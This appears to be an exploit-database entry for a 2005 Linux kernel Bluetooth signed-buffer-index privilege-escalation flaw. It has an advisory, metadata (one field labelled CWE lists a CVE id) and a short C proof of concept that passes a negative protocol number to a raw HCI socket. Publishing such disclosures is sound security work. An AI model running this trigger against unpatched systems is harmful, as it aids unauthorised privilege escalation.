Linux Kernel Signed-Buffer-Index Vulnerability

vendor:

Kernel

by:

SecurityFocus

7.2

CVSS

HIGH

Local Privilege Escalation

119

CWE

Product Name: Kernel

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: YES

Related CWE: CVE-2005-1763

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2005

Linux Kernel Signed-Buffer-Index Vulnerability

A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes. A local attacker may leverage this issue to gain escalated privileges on an affected computer.

Mitigation:

Apply the appropriate patch from the vendor.

Source

Exploit-DB raw data:

/*
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/926/

source: https://www.securityfocus.com/bid/12911/info

A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.

A local attacker may leverage this issue to gain escalated privileges on an affected computer. 
*/

#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>

main()
{
        int ctl;

        /* Open HCI socket  */
        if ((ctl = socket(AF_BLUETOOTH, SOCK_RAW, -1111)) < 0)
        {
                perror("Can't open HCI socket.");
                exit(1);
        }
}